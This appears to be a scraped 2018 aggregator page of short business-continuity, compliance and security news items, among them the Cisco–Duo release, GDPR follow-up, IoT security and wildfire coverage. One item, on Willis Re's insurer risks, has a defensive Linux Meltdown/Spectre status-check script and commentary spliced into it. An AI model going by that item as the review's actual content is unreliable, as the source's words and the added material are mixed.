For more information about Cisco’s intent to acquire Duo Security, read the following blogs from:

Investor and Media Call

Cisco will host a joint investor, media and industry analyst call on Thursday, August 2, at 6:00 a.m. PDT/9:00 a.m. EDT to discuss the proposed transaction. The call will feature Rob Salvagno, vice president of corporate development at Cisco; David Goeckeler, executive vice president and general manager of Cisco’s networking and security business; and Duo Security CEO Dug Song. To join the webcast, visit https://investor.cisco.com. Toll-free dial-in number is 800-779-1185; or 1-312-470-7366; Passcode: 3862813. Conference call replay will be available approximately one hour after the conclusion of the event through Friday August 10, toll-free at 800-925-0258 or 203-369-3861 (no passcode required). The replay will be available on the Cisco Investor Relations website at http://investor.cisco.com, no password required.

About Cisco

Cisco (NASDAQ:CSCO) is the worldwide technology leader that has been making the Internet work since 1984. Our people, products, and partners help society securely connect and seize tomorrow's digital opportunity today. Discover more at newsroom.cisco.com and follow us on Twitter at @Cisco.

RSS Feed for Cisco: http://newsroom.cisco.com/rss-feeds

Cisco and the Cisco logo are trademarks or registered trademarks of Cisco and/or its affiliates in the U.S. and other countries. To view a list of Cisco trademarks, go to: www.cisco.com/go/trademarks. Third-party trademarks mentioned in this document are the property of their respective owners. The use of the word partner does not imply a partnership relationship between Cisco and any other company.  

About Duo Security

Duo Security helps defend organizations against data breaches by making security easy and effective. Duo Beyond, the company's category defining zero-trust security platform, enables organizations to provide trusted access to all of their critical applications, for any user, from anywhere, and with any device. The company is a trusted partner to more than 12,000 customers globally, including Dresser-Rand, Etsy, Facebook, K-Swiss, Random House, Yelp, Zillow, Paramount Pictures, and more. Founded in Michigan, Duo has offices in Ann Arbor and Detroit, as well as growing hubs in Austin, Texas; San Mateo, California; and London, UK. Visit Duo.com to find out more.

Forward-Looking Statements
This press release may be deemed to contain forward-looking statements, which are subject to the safe harbor provisions of the Private Securities Litigation Reform Act of 1995, including statements regarding the acquisition enabling Cisco customers to securely connect users to any application on any networked device, Duo's unified access security and multi-factor authentication helping Cisco accelerate priority areas across its networking and security portfolio, the expected benefits to Cisco and its customers from completing the acquisition, and plans regarding Duo personnel. Readers are cautioned that these forward-looking statements are only predictions and may differ materially from actual future events or results due to a variety of factors, including, among other things, that conditions to the closing of the transaction may not be satisfied, the potential impact on the business of Duo due to the uncertainty about the acquisition, the retention of employees of Duo and the ability of Cisco to successfully integrate Duo and to achieve expected benefits, business and economic conditions and growth trends in the networking industry, customer markets and various geographic regions, global economic conditions and uncertainties in the geopolitical environment and other risk factors set forth in Cisco's most recent reports on Form 10-K and Form 10-Q. Any forward-looking statements in this release are based on limited information currently available to Cisco, which is subject to change, and Cisco will not necessarily update the information.

For more than three decades, millions of Americans across thousands of communities have gathered together on the first Tuesday in August to celebrate National Night Out, an event promoting police-community partnerships and fostering neighborhood connections.

When the first National Night Out was held in 1984, more than 2.5 million citizens organized to give recognition to their local police forces. By 2016, the annual event had grown to include more than 38 million Americans across 16,000 communities. National Night Out celebrates police officers and provides an opportunity to thank them for the critical protection and services they so bravely provide. It’s the perfect occasion for citizens to get to know members of their town’s police force on a first-name basis, and vice versa.

While festivities vary by community (and many Texas towns choose to celebrate on the first Tuesday of October), National Night Out events often include block parties, parades, concerts, and cookouts, making it a family-friendly event enjoyed by people of all ages.

Emergency personnel are on hand to give safety demonstrations, explain their jobs to children, and talk about drug prevention and anti-crime initiatives in a relaxed, casual environment.



The Value of a “Built In” vs. “Bolted On” E&C Program


Ethics and compliance are far too often neglected by boards of directors at big firms, even though it’s settled law and policy that boards of directors are required to oversee company compliance. In fact, a survey of 26 past and present Chief Ethics and Compliance Officers (CECOs) reveals that most CECOs feel their boards don’t fully understand the ethics and compliance programs they should be overseeing and that they ask too little of senior management when it comes to ethics.

It seems like ethical failures in major companies are in the headlines on an almost daily basis. Sexual harassment and abuse, toxic workplace cultures, retaliatory firings against those who speak up – the list goes on and on. And after each new case, one of the first and most crucial questions is, “Where was the board?”

While it’s settled law and policy that boards of directors are required to oversee company compliance with law and regulation, it seems that ethics and compliance are far too often neglected by the boards of big firms. The failure of proper E&C oversight can have far-reaching consequences, as the basic function of ethics and compliance can be tied directly to one of the central concerns of a board: value and reputation.

To foster an understanding of how boards engage with ethics and compliance, we at LRN turned to 26 past and present Chief Ethics and Compliance Officers (CECOs) of major global companies for in-depth interviews on the role and impact of boards. We learned most CECOs feel that boards do not fully understand the E&C programs they’re supposed to be overseeing and spend limited time on these programs while requiring too little from senior management when it comes to E&C.



(TNS) — When he was home for lunch Monday, Dennis Wagner, director of engineering for the town of Windsor, got a phone call from an unknown number so he decided not to answer.

When he checked his voicemail, he discovered it was a reminder from Weld County to sign up for emergency alerts, if he hadn't already. Of course, Wagner said, he has, because it's one of the best ways to learn if any harsh weather is expected to hit Windsor.

The old method — outdoor warning sirens — seems pretty outdated, he said.

Other Windsor officials agree, as do those in Greeley. After the mile-wide, 2008 tornado that hit Windsor and other parts of Weld County, Windsor residents have wondered on social media and at town events — like this year's commemoration of the 10-year anniversary of the tornado — why the town hasn't chosen to put sirens in place.



We’ve all been there at some point during our lives: locked out of the house or car because we’ve lost or forgotten our keys (and it always seems to happen when we’re already running behind!). But as frustrating as the situation is, the good news is it’s usually short-lived—once we have our spare key in hand, we’re back in business. But what happens when it’s a key member of your team who’s been lost or sidelined? Do your business continuity management plans account for that?

A strong and focused business operations plan includes the identification of key personnel as well as a succession plan for those essential people. In addition, a successful Business Continuity/Disaster Recovery (BC/DR) plan must identify the key recovery personnel and the critical responsibilities to be addressed in the event of a business disruption. If some of the key personnel cross over between business operations and the BC/DR team, then it’s even more important to be confident you have all your bases covered.



Where cybercrime is concerned, it’s not whether an organization will be attacked, it’s when.

Juniper Research projects that the global cost of data breaches will exceed $2.1 trillion by 2019, almost four times the cost of breaches in 2015, and that by 2020 the average cost of a single data breach will exceed $150 million.

How organizations respond to cyber-attacks and other emergencies can help mitigate any damage and make the recovery process more efficient.



I love metrics, as any regular reader of this blog knows. I think they are the only way to obtain a clear, objective view of the health of a business continuity management (BCM) program and the ability of an organization to recover from a disruption.

But metrics aren’t an end in themselves, obviously. They are a means to an end. Their real value lies in the fact that you can use them to improve the state of your BCM program.


I take it for granted that metrics can help you strengthen your BCM program because I have seen it happen so many times.

However, it occurred to me that a lot of business continuity professionals might have only a vague idea of how to go about leveraging metrics in this fashion.

For that reason, I decided to devote today’s blog to the topic.



With remote working on the rise, how do we ensure we’re communicating effectively with others, through good old-fashioned conversation? Alison Coleman reports

Digital technology has transformed the way that we communicate at the expense of face-to-face communication. As psychologist Susan Pinker says in her book, The Village Effect, “In a short evolutionary time, we have changed from group-living primates skilled at reading each other’s every gesture and intention, to a solitary species, each one of us preoccupied with our own screen.”

Nowhere is this more evident than in the modern workplace, where employees – particularly the growing numbers of remote and mobile workers – are increasingly reliant on email, texts and instant messaging to interact with their colleagues. And with a Cancer Research UK study revealing that Millennials (who will represent 75% of the workforce by 2030) are shunning face-to-face conversation in favor of chatting online, it’s a trend that looks set to continue.



Tuesday, 31 July 2018 14:36

Why it’s good to talk

We talk a lot about the need to mitigate the operational risks of a business disruption: what if your organization loses access to a key facility or suffers a ransomware attack or experiences the loss of a critical vendor?

Those of us who work in business continuity and IT/disaster recovery think about these kinds of problems night and day—and we work hard to create plans to mitigate the risks of them happening and to manage the impact if they do.

However, there is one kind of impact that is quite significant but frequently overlooked: the financial impacts which a business disruption can cause the company.



(TNS) — When a blistering heat wave struck the Southland earlier this month, the region’s electric grid was so overwhelmed that more than 100,000 customers in Los Angeles had at some point lost power. Some went days without electricity.

Now, as Southern California endures another round of scorching heat that forecasters expect will shatter daily records in some areas on Wednesday, utility officials are hoping to avoid similar chaos by staffing extra workers and imploring residents to ease up on their thermostats to give the aging power system a chance to cool down.

“It’s similar to running your car at 100 mph, nonstop,” said Los Angeles Department of Water and Power spokesman Joe Ramallo, referring to those who blast their air conditioning day and night. “Eventually, you’re going to have some problems. Distribution equipment is like that — it needs a break.”



Cybercrime tops the list of the most dangerous risks for insurers in Willis Re’s midyear review of issues likely to keep insurance executives up late at night.

Specifically, the most pervasive cybersecurity problems to date are Meltdown and Spectre, two hardware vulnerabilities in the speculative-execution design of the processors inside almost every server, computer and mobile device. They cannot be patched away in one place: addressing them takes a combination of vendor microcode and operating system updates, and the mitigations themselves carry a performance cost.
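Because the mitigations arrive piecemeal through microcode and kernel updates, the first practical question on a Linux host is simply whether the kernel considers itself mitigated. The following Python is an added example, not part of the Willis Re review: it reads the kernel’s own per-issue status files under /sys/devices/system/cpu/vulnerabilities/ (present since kernel 4.15) and flags anything reported as Vulnerable. The status string formats are those the kernel emits; the report layout, the fail-closed treatment of unparsed lines and the exit codes are this example’s own choices.

```python
"""Added example, not part of the Willis Re review: summarise the Linux kernel's
own report of Meltdown/Spectre mitigation status. Since kernel 4.15 each issue
has a file under /sys/devices/system/cpu/vulnerabilities/ whose text begins
with "Not affected", "Mitigation:" or "Vulnerable" (KVM-related entries such as
itlb_multihit carry a "KVM: " prefix). Layout and exit codes are this example's
own choices."""
from pathlib import Path

SYSFS_DIR = "/sys/devices/system/cpu/vulnerabilities"


def classify(status_line: str) -> str:
    """Map one sysfs status line to not_affected / mitigated / vulnerable / unknown."""
    s = status_line.strip()
    if s.startswith("KVM: "):          # e.g. "KVM: Mitigation: VMX disabled"
        s = s[len("KVM: "):]
    if s.startswith("Not affected"):
        return "not_affected"
    if s.startswith("Mitigation:"):
        return "mitigated"
    if s.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"                   # fail closed: anything unparsed is suspect


def summarise(contents: dict) -> dict:
    """{issue: raw_text} -> {issue: (classification, raw_text)}."""
    return {name: (classify(raw), raw.strip()) for name, raw in contents.items()}


def read_mitigation_status(sysfs_dir: str = SYSFS_DIR) -> dict:
    """Read every file in the sysfs directory. An absent directory (pre-4.15
    kernel, non-Linux host, or a container that hides /sys) yields {} rather
    than an exception, so callers can tell 'unknown' from 'all clear'."""
    d = Path(sysfs_dir)
    if not d.is_dir():
        return {}
    contents = {f.name: f.read_text(errors="replace")
                for f in d.iterdir() if f.is_file()}
    return summarise(contents)


def unmitigated(status: dict) -> list:
    """Issue names the kernel reports as Vulnerable, plus any it could not classify."""
    return sorted(name for name, (cls, _) in status.items()
                  if cls in ("vulnerable", "unknown"))


if __name__ == "__main__":
    status = read_mitigation_status()
    if not status:
        print(f"{SYSFS_DIR} not available; cannot determine mitigation status")
        raise SystemExit(2)
    for name in sorted(status):
        cls, raw = status[name]
        print(f"{name:24s} {cls:13s} {raw}")
    bad = unmitigated(status)
    print("ACTION NEEDED: " + ", ".join(bad) if bad else "all reported issues mitigated")
    raise SystemExit(1 if bad else 0)
```

Run it as a script on each host, or point read_mitigation_status() at a directory of status files copied from a fleet; a non-zero exit code makes it easy to wire into a compliance check. A "Mitigation:" line only says the kernel applied a mitigation, not that the microcode is current, so pair it with the vendor’s microcode advisories.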

Not far behind is the threat of falling into the information technology gap. Most insurers surveyed by Willis have just completed, are in the middle of, or are planning a major IT systems overhaul. They report a concern surrounding the expense of constant updates and at the same time the risk of not being able to satisfy customer service expectations by falling behind on the latest upgrades.



One of the biggest challenges a business faces during a wildfire is communication. Wildfires can grow from a small brush fire into an inferno that engulfs thousands of acres in only a matter of hours.

As a result, officials must be on their toes and have the right technology, processes, and training in place to ensure that those in harm’s way are given the information they need to protect themselves and their loved ones at a moment’s notice.

Some of the most memorable wildfires in the U.S. were the horrific California wildfires of 2017.

Wildfires hit Sonoma County especially hard. Even though officials evacuated 100,000 people, 24 people still died.

The Sonoma Assessment Team evaluated the emergency notification process and response to these fires and found there was an established public alert and warning system to alert residents and visitors to the county.

In fact, alerts began the night the fire broke out.



Albert Einstein once stated “The important thing is not to stop questioning. Curiosity has its own reason for existing.” As a recent college graduate, this quote has helped influence my decisions in college and starting a career. I was always very quiet and did not like being outside of my comfort zone…until recently…my curiosity helped me step out of my comfort zone. Being curious and confident was the reason why I graduated in the field of Information Science Technology (IST), and why I chose to intern at BC in the Cloud.

While in college, I faced many important decisions in my life. When I started my freshman year at Penn State I wanted to be a computer scientist and develop software. I’ve always had a great passion for technology and thought this field would be great. It took me about two years to realize that I was losing interest in computer science; the course materials were overly complicated and lacked excitement. But I didn’t want to stop pursuing my passion in technology. Stuck, I found myself wondering whether I should stay in this field. Then a friend told me about a major called Information Science Technology (IST). What he told me blew my mind because I could learn and enjoy development without taking excessively complex engineering courses. IST breaks up into two sections: Integrations and Application, and Design and Development. Also, this major does not just provide development courses, but courses in networking, telecommunication, cyber security and project management. After learning about this, I became curious, but also afraid. I was afraid that if I decided to change my major, people would think of me as a person who only just works on computers (the IT-guy stereotype). I ended up following my curiosity and studied IST. And I don’t regret it at all.



In today’s constantly moving and changing world your community needs a mass notification system.

How else will you quickly reach your residents with warnings or instructions during a pending storm? An active shooter scenario? A flash flood across a major highway?

Once a system is purchased, the key to success?  Implementation.  A well-considered implementation will lay the foundation for how effectively the system will operate during a crisis.  Check out these five pro tips for a smooth and stellar implementation.



Applying the Standard for Independent Contractors

California has adopted a new ABC test for determining whether a worker should be classified as an employee or an independent contractor. This new multifactor test has sent shockwaves across employers statewide, and its tricky application has some reeling. Between the new test and questions about retroactivity and joint employer applications, employers should use caution and evaluate their independent contractor relationships.

The “ABC test” recently adopted by the California Supreme Court in the Dynamex Operations West, Inc. v. Superior Court case is now touted as the best way to make the distinction between an “exploited employee” and an “entrepreneur.” The court’s adoption of the ABC test for determining whether a worker should be classified as an employee or an independent contractor has sent shock waves through businesses that have relied in the past upon a flexible, multifactor common law test where none of the individual factors, taken alone, is necessarily controlling.



We all know that retaining loyal, happy customers is the key to any successful business, but the fickle consumer world is not always easy to please. A series of guidelines has just been published, bringing together international best practice on customer satisfaction.

From handling complaints to service with a smile, taking care of customers is a science in itself and one not to be taken lightly as it can have a dramatic effect on both staff morale and the bottom line. Studies abound that show that those companies that perform well in customer experience have higher revenues and returns on investments. Not to mention that most customers don’t go back to a company if they have a bad experience.

Getting the customer experience right, then, is imperative. A series of international standards dedicated to improving customer satisfaction has just been updated, to ensure the information is most relevant and reflects revisions to ISO’s flagship standard for quality, ISO 9001.



The Industrial Internet of Things (IIoT) has opened many security concerns, confusion about what constitutes an endpoint and unrealistic perspectives on protecting systems and data, according to the 2018 SANS Industrial IoT Security Survey report.

More than half of those taking the SANS survey reported that the most vulnerable aspects of their infrastructure are data, firmware, embedded systems or general endpoints. At the same time, respondents indicated that the debate continues over the definition of an IIoT endpoint.

"The discrepancy in defining IIoT endpoints is the basis for some of the confusion surrounding responsibility for IIoT security," according to Doug Wylie, Director of the Industrials & Infrastructure Business Portfolio at SANS Institute. "Many practitioners likely are not adequately identifying and managing the numerous assets that in some way connect to networks and present a danger to their organizations. For this reason, it is important for company IT and OT groups to agree to a common definition to help ensure they adequately identify security risks as they evolve their systems to adapt to new architectural models."

The survey uncovered other potential endpoint issues. For example, only 40 percent said they apply and maintain patches and updates to protect IIoT devices and systems, and 56 percent noted difficulty in patching as one of the greatest security challenges. Almost 40 percent said identifying, tracking and managing devices represented another significant security challenge.

Finally, the survey unveiled big gaps between the OT, IT and management perceptions of IIoT security. Only 64 percent of OT departments reported being somewhat-confident or confident in their ability to secure their IIoT infrastructure, as opposed to 83 percent of IT department respondents and 93 percent of company leaders.


Are you truly prepared to help steer your business through a major disruption?

Consider the range of threats that can affect your business continuity:

  • Power loss
  • Natural disaster such as a hurricane, wildfire or major blizzard
  • Cyberthreat
  • Active shooter scenario
  • Pandemic

Any one of these threats – and others – can disrupt your business. And then what? You need a business continuity plan (BCP) that helps get your business back on its feet as quickly as possible. You cannot afford to waste time determining how to react during and after a threat, because ceasing operations can be catastrophic.

Your business continuity plan should help protect your company against threats and help you recover from them. Be sure your BCP is effective by signing up for our free upcoming webinar, 30 Business Continuity Best Practices in 30 Minutes. This quick presentation provides you dozens of best practices to help navigate a major business disruption.



Nick Sacke discusses the issue of IoT security and how concerns around it are a priority for organizations when it comes to deploying IoT services, especially when using existing networks that are known to be vulnerable.

Security takes priority when it comes to the development and deployment of IoT, with Gartner predicting that by 2020, IoT security will make up 20 percent of annual security budgets. As a potential inhibitor, analysts, vendors and stakeholders alike are concerned about the potentially significant security risks associated with IoT deployments. These concerns are playing a role in decision-making and end user confidence in deploying IoT services, particularly when it comes to utilising existing networks that are known to be vulnerable, for example Wi-Fi, and those that are new and operate in the unlicensed spectrum, such as LoRaWAN and Sigfox. The lack of standardization within the IoT industry is also acting as a barrier to deployment; with both older and newer networks being used for IoT, more standardization of security policies is urgently required.

One issue undermining user confidence is the lack of information regarding the security arrangements already in place for networks underpinning IoT, both the licensed and unlicensed variants. Low Power WAN (LPWAN) technology platforms such as LoRaWAN and Sigfox use unlicensed spectrum to deploy IoT sensors at scale and it’s been heavily reported that such network types lack the traditional security mechanisms of cellular networks, with carriers talking about a cellular based IoT network being ‘more secure’ as traffic on these network types is within the control of the respective carrier.

To tackle the argument, it is important to make the distinction between the types of sensor traffic that are passed over these networks, and how security can be applied at various points in the network. For example, all the traffic that runs through a LoRaWAN network of sensors is non-IP protocol based, has business grade 128-bit encryption, and requires decryption via an application server that sits in a private cloud environment. This contrasts favourably with Wi-Fi based sensor networks, which may interface with public Internet connections and therefore require very stringent security controls locally at the site.



Tuesday, 24 July 2018 15:01

IoT security: an overview of the issues

Downtime has been a bugbear for organizations ever since IT systems first started to be used, but according to a University of Chicago study, the causes of downtime are still often unknown. Doron Pinhas asks why this is still the case and looks at improvements that can be made.

Benjamin Franklin said: “Three may keep a secret, if two of them are dead.” Yet there are apparently some secrets time hasn't revealed – yet. One thing we haven't figured out is why service outages occur! A study by the University of Chicago, listing the usual reasons one would expect to see for outages, concludes that the biggest reason for outages is ‘unknown’.

That's especially telling, since IT activities, one would presume, are recorded in log files, and lend themselves to analysis. The study examined hundreds of service outages at companies that provide services via the cloud. And while the ‘usual suspects’ - bugs, upgrades, network or power issues, etc. - figured significantly, ‘unknown’ was still the single largest reason reported by IT administrators for outages. Meaning that even after a thorough, even forensic investigation, they couldn't figure out what caused the outage.

That's unacceptable, because outages can cost companies millions, and without knowledge of what caused an outage, there is no way to know how to prevent the next one.



New IAPP and TrustArc research uncovers technology use among global businesses to address new privacy and data protection challenges.

Singapore (July 23, 2018) — TrustArc, the leading data privacy management company, and The International Association of Privacy Professionals (IAPP), the world’s largest global information privacy community, today announced at the 2018 IAPP Asia Privacy Forum the results of new research that examined how privacy technology is bought and deployed to address privacy and data protection challenges. Surveying privacy professionals worldwide, the findings of the survey show that privacy management technology usage is on the rise across all regions and that privacy teams have significant influence on purchasing decisions for eight of the 10 technology categories surveyed.

“This global survey is critical in our efforts to better understand how privacy professionals are addressing compliance challenges and the technologies that are being deployed now and in the near future,” said Chris Babel, CEO of TrustArc. “Though security budgets remain larger, we’re seeing a marked shift in privacy teams’ influence over technology purchasing decisions. This trend confirms what we’re seeing among our customers — that they have a growing need for technology solutions to help them manage privacy compliance at scale on a global basis.”

The EU GDPR and other global and domestic legal reforms, combined with technological advancements, have made the task of operationalizing privacy and data protection vastly more complicated. Businesses now must account for how data is entering the organization, how it is being used, what permissions are attached to it and who has the responsibility for managing it. To address these challenges, the demand for privacy technology continues to grow rapidly.



(TNS) - Nearly 10 months after wildfires ravaged the North Bay, a high-stakes legislative tug of war is underway in Sacramento, where the governor, state lawmakers, utilities, local government officials and fire survivors are battling over who pays for at least $10 billion in damages.

As Santa Rosa and other fire-stricken communities struggle to rebuild, Pacific Gas & Electric is lobbying hard for a limit to the financial liability of California electric utilities in the destructive wildfires expected to result from a warmer, drier California climate.

Though Gov. Jerry Brown and legislative leaders have said they won’t retroactively change liability laws for the 2017 fires, groups representing fire survivors, trial attorneys and county governments have voiced opposition to any immediate change in liability policy.



Storytelling. Why It’s Become a Buzzword in Business

From international companies like Nike, Microsoft and IBM, to small startups, many organizations now employ Chief Storytellers as part of senior management, a move that makes a lot of sense. The business of selling has grown more complicated and competitive requiring new methods of communication to engage customers. Ironically the “new” method of using storytelling as a marketing tool has been around for millennia and is part of our collective DNA. Just ask any cave person who ever sat around a camp fire and became mesmerized while listening to a hunter recount the story of a giant mastodon that got away that day.

In the same way that the cave guy’s story of the hunt fascinated his listeners and fired them up to try again for that escaped mastodon, Chief Storytellers today also build an emotional connection between a product or brand and their customers. Like the cave guy, they too persuade people to take actions: Love us, stay loyal and continue buying our products.



According to ISO, risk is defined as the effect of uncertainty on objectives, focusing on the effect of incomplete knowledge of events or circumstances on an organization’s decision-making. For companies that have accepted this definition and are looking to mature their risk programs and enable a risk culture, ISO 31000’s risk management framework is a great place to start. The ISO 31000 principles can help these organizations score the maturity of their risk processes and culture.

Technology is a critical element of implementing effective risk and decision-making practices because it bridges the communication gap between teams, breaks down departmental silos, facilitates collaboration and information access, and automates tedious tasks. Great technology can’t make up for bad practice, but without it, no program will meet the ISO 31000 principles.

ISO 31000 delivers a clearer, shorter and more concise guide that will help organizations use risk management principles to improve planning and make better decisions.

To explain how Resolver believes risk technology can help organizations match ISO’s vision, we break down the 11 principles into groups and share our insight:



4 Next Steps

With the European Union’s General Data Protection Regulation (GDPR) deadline now behind us, the real work of maintaining ongoing compliance begins. In this article, Gartner’s Stephanie Quaranta outlines the actions privacy and compliance executives should take for the rest of 2018 and into next to ensure the effectiveness of GDPR-related changes.

The past two years have been busy ones for privacy and compliance executives. The formation of the General Data Protection Regulation (GDPR) in April 2016 gave organizations just over two years to understand the requirements, conduct a gap analysis and create and execute a plan for bringing their organizations into compliance.

Since then, privacy and compliance executives have led the charge in appointing Data Protection Officers, building out data protection impact assessment processes, revisiting breach requirements and much more. After two years spent focused on preparing their organizations for the May 25, 2018 implementation deadline, privacy and compliance executives are finally able to pick their heads up and take stock of the changes made. But now they are left to wonder: what’s next?

Though there is no one right answer to that question, there are four areas most organizations will want to invest in between now and 2020 to maintain ongoing compliance.



Monday, 23 July 2018 14:12

You’re GDPR Compliant … Now What?

I’ve seen many definitions of the term “data science.” I think it is best summed up as the art of studying data and pulling insights out of it that can practically benefit your business and bottom line.

That’s fine, you might be thinking. But why are you talking about data science in a blog dedicated to business continuity and IT/disaster recovery?

The answer is, because one of the areas where data science can help you is in business continuity and IT/disaster recovery.



On 30th March 2019, the United Kingdom will leave the EU and the possibility of there being no agreement in place between the UK and the EU seems to be increasing. In response, the EU has warned companies to start planning for this scenario.

In a European Commission Communication which was adopted on 19th July, the Commission states:

“While the EU is working day and night for a deal ensuring an orderly withdrawal, the UK's withdrawal will undoubtedly cause disruption – for example in business supply chains – whether or not there is a deal. As there is still no certainty that there will be a ratified withdrawal agreement in place on that date, or what it will entail, preparations have been ongoing to try to ensure that the EU institutions, Member States and private parties are prepared for the UK's withdrawal. And in any event, even if an agreement is reached, the UK will no longer be a Member State after withdrawal and will no longer enjoy the same benefits as a member. Therefore, preparing for the UK becoming a third country is of paramount importance, even in the case of a deal between the EU and the UK.

“Having said that, preparing for the UK's withdrawal is not only the responsibility of the EU institutions. It is a joint effort at EU, national and regional levels, and also includes in particular economic operators and other private parties – everyone must now step up preparations for all scenarios and take responsibility for their specific situation.”

An accompanying fact sheet spells out the situation more starkly, stating that: "It is now urgent that businesses in the EU start preparing for the UK’s withdrawal, if they have not yet done so ... all businesses concerned have to prepare, make all necessary decisions, and complete all required administrative actions, before 30 March 2019 in order to avoid disruption."

In an annex to the Communication, the European Commission published a list of areas which may be impacted by Brexit and which need to be considered in Brexit contingency planning. Read the list here (PDF).

(TNS) - A scrambled voice fills the room sounding like someone trying to talk under water intermixed with variable modulated frequency sounds one might hear from a music keyboard synthesizer.

A person sits behind a radio carefully moving a silver control knob with his fingers to find just the right radio frequency making the scrambled talk into a voice he can understand.

The person is a member of the Clay County Area Amateur Radio Club, which participated recently in a national Amateur Radio Relay League Field Day at the Emergency Management Operations Center in Flora.

During the early morning hours of June 23, club members set up several different sizes of antennas to use with their radios to cover a wide range of frequencies for emergency communications.



Friday, 20 July 2018 16:13

Ham Radio Club Prepares for Disaster

Ensuring the Effectiveness of a Risk-Based Audit Plan

Protiviti’s Jim DeLoach explores how to bolster internal audit’s efforts in providing recommendations that are strong, actionable and in keeping with the board’s expectations.

We’ve always believed that boards should ensure that their organizations maximize the full potential of internal audit. There are four C’s directors should consider when evaluating the sufficiency of any risk-based audit plan: culture, competitiveness, compliance and cyber.

We’re not suggesting they are the only things a board should consider, but they should be on the board’s radar.

In 2015, the world’s largest ongoing study of the internal audit profession – the Global Internal Audit Common Body of Knowledge (CBOK) – was conducted by The Institute of Internal Auditors (The IIA) and Protiviti to ascertain expectations from key stakeholders, including board members, regarding internal audit performance. There were several imperatives for internal audit gleaned from the directors participating in the CBOK Stakeholder Study, which is conducted every five years. Among them: Focus more on strategic risks, think beyond the scope of the audit plan and add more value through consulting.



(TNS) - The Owensboro-Daviess County, Ky., 911 board on Tuesday discussed a potential upgrade to the county's weather siren system that officials say is needed.

John Clouse, deputy director of Daviess County Emergency Management, told board members the current siren software needs replacing because it is no longer being supported by the vendor.

"There are no further upgrades from the company" to patch problems with the software, Clouse said. Because of that, three sirens in the county have had software failures, making them no longer able to "communicate," and inform officials as to whether or not they are working.



While many business continuity plans focus on the effects of an incident rather than the cause, Richard Duncan explains why terrorism response may be a special case requiring a different and more proactive approach.

Here in the UK we have seen our fair share of terror events that have had a serious impact on all aspects of our lives, including companies that have found themselves directly affected, or found themselves within the wider emergency response cordon, or indeed had their business activity seriously curtailed during the investigative process that follows. The latter can place restrictions on the use of areas of the business until those investigations are concluded.

All this external activity needs a response, and yet organizations, in my experience, generally do not consider within their business continuity plans how they will respond. For example: who will liaise with the emergency responders? What role will the organization be expected to play in the response and recovery phases? Has the crisis management team (CMT) received training in business continuity considerations for when the business has been affected by a terrorist incident?

I believe that the first step in the process as a 'baseline' should be to consider how the organization plans for its response to each of the five UK terror threat levels, in terms of asset and personnel security and secondly, how to provide the CMT with immediate guidance on what needs to be done from a strategic, tactical and operational perspective, if the business is unfortunate enough to be caught up in an attack. That guidance should be task orientated and needs to consider all aspects from the customer facing staff right up to the strategic management of the organization.



Revision is ongoing for ISO 22000 on food safety management systems, which has just reached the Draft International Standard (DIS) stage. The revised standard will incorporate a new core structure as well as recognized key elements to ensure food safety at every step of the food chain.

The ISO 22000 revision aims to consolidate the most recent issues surrounding food safety to suit the current landscape of the food sector. It is a very comprehensive process and the working group revising the standard has covered several extensive concepts. The experts met three times in 2016 and processed 1,800 comments from a variety of global stakeholders representing a broad range of positions. Now, their main task is to translate the revised concepts included in the standard and communicate these to the users in a clear and concise manner that makes ISO 22000 easier to understand and implement for organizations of all sizes, in every aspect of the food chain.

The new version of ISO 22000 will contain a number of minor alterations that have been introduced to increase the readability and clarity of the standard, as well as some substantial changes that are more structural in nature. The main highlights are as follows:



Training for boards jumps by nearly 30 percent compared with 2017 findings, but major training gaps persist despite a volatile ethics and compliance environment

PORTLAND, OR – Leading ethics and compliance software and services company NAVEX Global® today announced the release of findings from its 2018 Training Benchmark Report. In the wake of a series of high-profile sexual harassment scandals in recent months, organizations have adjusted their training programs – and are providing more training to boards of directors.

The report, now in its fifth year, is based on survey responses from more than 1,200 ethics and compliance professionals globally. Seventy-three percent of respondents said they train their board members, up from 44 percent in 2017 and 58 percent in 2016. This shift reflects a major positive trend for organizations and demonstrates an increasing awareness of their obligation to keep directors apprised of ethics and compliance risks. Recent reputation-damaging events have heightened awareness around the need to educate directors – but the survey reveals that major gaps persist as directors are not fully educated on the most pressing risks.



For organizations, social media is the new Wild West: There is no sheriff, vigilante justice is the order of the day, and things can get very crazy very quickly.

If you don’t believe me, just ask Papa John’s, Starbucks, and United Airlines.



The bad behavior of one or two employees, amplified through the bullhorns of Twitter, Instagram, and Facebook, can snowball in a way that threatens a brand that took years to build. Suddenly, instead of being the pizza chain that loves football, the community-minded coffee chain, or the airline that offers something special in the air, your organization might become known as the one with the racist chairman or managers, or the one that dragged a paying passenger off an overbooked flight.

Sometimes social media calls attention to behavior that truly is wrong and should be publicized and corrected.



Following our recent acquisition by InterVision, we’ve been positioned in the 2018 Gartner Magic Quadrant for Disaster Recovery as a Service for the third year in a row.

According to Gartner, “The biggest changes for 2018 materialized in the form of evolved inclusion and exclusion criteria, and even greater emphasis on the ‘value for money’ when it comes to support for heterogeneous platforms.” The report is designed to answer the question, “If I want DRaaS and only DRaaS, which providers are the most relevant?”



The best products and services leverage their data to its fullest. Depending on the application or service, data is collected when and where it’s generated: media on the production site, IoT data near its infrastructure, research data near the instruments, and so on. Getting that data to the public cloud enables further data processing, machine learning or distribution.

It’s in these workflows that we want to collect a *lot* of data, but we may not want to move all the data to a compute-intensive location like the public cloud. This is why we have introduced metadata tagging with SwiftStack 1space.

With SwiftStack 1space, we can create a set of tags that will trigger data movement between on-premises and public cloud storage resources.



In order to effectively transform business ideas into actions, you need a plan. A quality plan. Guidance on how to create one has just been updated, providing a powerful tool to complement any quality management system, including ISO 9001.

Producing something – whether it be a product, service, process or project – always involves a series of interconnected or complementary processes and tasks that have to be performed, and planning them effectively in advance often leads to better results. A quality plan helps organizations do just that, as it includes a specification of the actions, responsibilities and associated resources that are needed to achieve the desired outcomes. It is useful as it describes how an organization will actually go about producing the product or service and how these actions can have an impact on other processes or parts of the business. It is a particularly useful tool for validating new products, services or processes before the work begins and for demonstrating to stakeholders how their requirements are going to be met.

ISO 10005:2018, Quality management – Guidelines for quality plans, gives guidelines for establishing and applying quality plans, and it has just been updated to provide more guidance and more examples to be relevant to organizations of all shapes and sizes.

Roy Ackema, Convener of the working group that updated the standard, said that while it is not essential to have in place ISO 9001, ISO’s flagship standard for quality management systems, in order to benefit from the guidance of ISO 10005, the two standards are based on many of the same concepts and principles, making them highly complementary to each other.



Wednesday, 18 July 2018 15:34

Guidance on quality plans just updated

